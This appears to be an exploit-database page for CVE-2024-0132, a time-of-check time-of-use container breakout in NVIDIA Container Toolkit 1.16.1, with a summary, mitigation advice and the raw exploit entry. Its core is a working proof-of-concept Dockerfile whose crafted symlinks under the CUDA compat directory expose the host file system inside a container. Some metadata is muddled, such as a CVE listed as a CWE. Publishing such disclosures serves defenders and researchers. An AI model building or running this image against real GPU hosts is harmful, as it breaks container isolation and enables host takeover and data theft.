Container Breakout with NVIDIA Container Toolkit

vendor:

NVIDIA Container Toolkit

by:

r0binak

6.1

CVSS

HIGH

Time-of-check Time-of-Use (TOCTOU) Vulnerability

TOCTOU-53

CWE

Product Name: NVIDIA Container Toolkit

Affected Version From: 1.16.1

Affected Version To: 1.16.1

Patch Exists: NO

Related CWE: CVE-2024-0132

CPE: a:nvidia:nvidia_container_toolkit:1.16.1

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=127758

Platforms Tested: Linux

2025

Container Breakout with NVIDIA Container Toolkit

NVIDIA Container Toolkit 1.16.1 and earlier versions are vulnerable to a Time-of-check Time-of-Use (TOCTOU) exploit. An attacker can leverage a specially crafted container image to access the host file system when default configurations are used. This exploit could result in various consequences such as code execution, denial of service, privilege escalation, information disclosure, and data manipulation.

Mitigation:

To mitigate this vulnerability, it is recommended to update NVIDIA Container Toolkit to a patched version that addresses the TOCTOU vulnerability. Additionally, limit access to containers and avoid running containers with unnecessary privileges.

Source

Exploit-DB raw data:

# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
#Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Tooklit 1.16.1
# CVE: CVE-2024-0132

Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
default configuration where a specifically crafted container image may
gain access to the host file system. This does not impact use cases
where CDI is used. A successful exploit of this vulnerability may lead
to code execution, denial of service, escalation of privileges,
information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:

Build and run a docker image based on such a Dockerfile:

FROM ubuntu

RUN mkdir -p /usr/local/cuda/compat/

RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test >
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1

RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
/usr/local/cuda/compat/libxxx.so.2

The host file system will reside in
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey `*r0binak*` Kanibor